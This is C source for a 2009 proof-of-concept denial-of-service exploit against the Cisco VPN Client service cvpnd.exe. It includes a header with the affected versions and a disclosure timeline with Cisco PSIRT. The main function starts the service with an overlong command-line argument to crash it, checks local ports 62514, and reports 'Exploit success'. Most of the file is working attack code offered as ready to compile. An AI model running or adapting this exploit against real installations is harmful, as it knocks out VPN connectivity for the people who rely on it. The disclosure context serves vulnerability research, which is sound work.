217 lines
No EOL
6.3 KiB
Text
217 lines
No EOL
6.3 KiB
Text
/*
|
|
Cisco VPN client version 5.0.03.0560
|
|
Cisco VPN client Version 5.0.04.0300
|
|
Cisco VPN client Version 5.0.05.0290
|
|
Cisco VPN client Version 4.8.02.0010
|
|
*/
|
|
|
|
/*
|
|
* Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
|
|
*
|
|
* By Alex Hernandez aka alt3kx (c) November 2009
|
|
*
|
|
* This POC is only for test. If an application read a malformed chars
|
|
* file like this POC, the application will be crashed.
|
|
*
|
|
* We tested this code on:
|
|
*
|
|
* Windows Vista Bussines SP1 Spanish
|
|
* Windows Vista Home Premium SP1 English
|
|
* Windows 2000 Server English
|
|
* Windows XP Professional SP3
|
|
*
|
|
* Cisco VPN client version 5.0.03.0560
|
|
* Cisco VPN client Version 5.0.04.0300
|
|
* Cisco VPN client Version 5.0.05.0290
|
|
* Cisco VPN client Version 4.8.02.0010
|
|
*
|
|
* Compiled on VC++ win32
|
|
*
|
|
* Friends:
|
|
* sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
|
|
*
|
|
* TT & DSRT
|
|
* daSh, p4r4n01ds, darkslaker, beto, motis.
|
|
*
|
|
* Very special credits to:
|
|
*
|
|
* str0ke (milw0rm.com)
|
|
* rathaus (securiteam.com)
|
|
* FX (Phenoelit.de)
|
|
* dSR! (segfault.es)
|
|
* 0dd (0dd.com)
|
|
*
|
|
*
|
|
* PH-Neutral 0x7d9, We hope to see u there intruders
|
|
*
|
|
* ---------------
|
|
* Report Timeline
|
|
* ---------------
|
|
* 06/03/2009 The vulnerability was discovered.
|
|
* 07/03/2009 Exploit/PoC code was developed (private).
|
|
* 09/03/2009 Cisco PSIRT was notified about the issue.
|
|
* 11/03/2009 Vendor response asking for details of the testing environment.
|
|
* 12/03/2009 Test scenario explained and sent a PDF document with details.
|
|
* 16/03/2009 Developers/PSIRT confirmed the vulnerability.
|
|
* 19/03/2009 New test scenarios around new versions (CISCO VPN client).
|
|
* 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279.
|
|
* 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276.
|
|
* 15/04/2009 New Advisory release (private).
|
|
* 16/04/2009 New PSIRT feedback no ETA avaiable.
|
|
* 23/04/2009 The development team working the fix.
|
|
* 01/05/2009 The development team estimated one month to fix.
|
|
* 01/06/2009 New PSIRT feedback, no ETA available.
|
|
* 29/06/2009 The development team estimated one month to fix.
|
|
* 28/07/2009 The development team working on maitenance release.
|
|
* 28/07/2009 The development team estimated one month to fix.
|
|
* 02/09/2009 New vulnerabilities found on CISCO VPN client.
|
|
* 02/09/2009 The development team can not publish the new version 5.0.6.
|
|
* 02/09/2009 The development team working on maitenance release.
|
|
* 02/09/2009 The development team estimated one month to fix.
|
|
* 10/09/2009 The BETA program should be finished by the end of Oct
|
|
* and the client posted next month.
|
|
* 07/10/2009 The development team estimated one month to fix.
|
|
* 11/11/2009 New PSIRT feedback RNA avaiable.
|
|
* 19/11/2009 The vulnerability goes public and PSIRT is informed.
|
|
* 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
|
|
*
|
|
* CISCO Fix and Details:
|
|
*
|
|
* BugToolKit:
|
|
* http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
|
|
*
|
|
* Intellishield Alert:
|
|
* http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
|
|
*
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <winsock.h>
|
|
#include <stdio.h>
|
|
#pragma comment ( lib, "ws2_32.lib" )
|
|
|
|
int CheckPortUDP( short int nPort )
|
|
{
|
|
struct sockaddr_in nSockServer;
|
|
|
|
WSADATA wsaData;
|
|
|
|
int lBusy = 0;
|
|
int nSocket;
|
|
|
|
/* Initialization */
|
|
if( WSAStartup( 0x0101, &wsaData ) == 0 )
|
|
{
|
|
/* Create Socket */
|
|
nSockServer.sin_family = AF_INET;
|
|
nSockServer.sin_port = htons( nPort );
|
|
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
|
|
|
|
/* Check UDP Protocol */
|
|
nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
|
|
|
|
lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
|
|
sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
|
|
|
|
/* Close Socket if Busy */
|
|
if( lBusy )
|
|
closesocket( nSocket );
|
|
|
|
/* Close Winsock */
|
|
WSACleanup();
|
|
}
|
|
|
|
/* Return */
|
|
return( lBusy );
|
|
}
|
|
|
|
int CheckPortTCP( short int nPort )
|
|
{
|
|
struct sockaddr_in nSockServer;
|
|
|
|
WSADATA wsaData;
|
|
|
|
int lBusy = 0;
|
|
int nSocket;
|
|
|
|
/* Initialization */
|
|
if( WSAStartup( 0x0101, &wsaData ) == 0 )
|
|
{
|
|
/* Create Socket */
|
|
nSockServer.sin_family = AF_INET;
|
|
nSockServer.sin_port = htons( nPort );
|
|
nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
|
|
|
|
/* Check TCP Protocol */
|
|
nSocket = socket( AF_INET, SOCK_STREAM, 0 );
|
|
|
|
lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
|
|
sizeof( nSockServer ) ) == 0 );
|
|
|
|
/* Close Socket if Busy */
|
|
if( lBusy )
|
|
closesocket( nSocket );
|
|
|
|
/* Close Winsock */
|
|
WSACleanup();
|
|
}
|
|
|
|
/* Return */
|
|
return( lBusy );
|
|
}
|
|
|
|
int main(void)
|
|
{
|
|
|
|
char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
|
|
//uncomment this line for Windows XP Spanish versions
|
|
//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
|
|
char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
|
|
PROCESS_INFORMATION pif;
|
|
STARTUPINFO si;
|
|
ZeroMemory(&si,sizeof(si));
|
|
si.cb = sizeof(si);
|
|
|
|
BOOL bRet = CreateProcess(
|
|
szPath,
|
|
buffer,
|
|
NULL,
|
|
NULL,
|
|
FALSE,
|
|
0,
|
|
NULL,
|
|
NULL,
|
|
&si,
|
|
&pif);
|
|
|
|
system("cls");
|
|
printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
|
|
printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n");
|
|
|
|
|
|
/* Check for TCP Port */
|
|
|
|
if( CheckPortTCP(62514) )
|
|
printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
|
|
else
|
|
printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");
|
|
|
|
/* Check for UDP Port */
|
|
|
|
if( CheckPortUDP(62514) )
|
|
printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
|
|
else
|
|
printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");
|
|
|
|
if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
|
|
return 1;}
|
|
|
|
else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
|
|
printf("\n[+] Few seconds to crash the program...\n");
|
|
printf("[+] Exploit success...\n\n");
|
|
return 1;}
|
|
|
|
CloseHandle(pif.hProcess);
|
|
CloseHandle(pif.hThread);
|
|
|
|
} |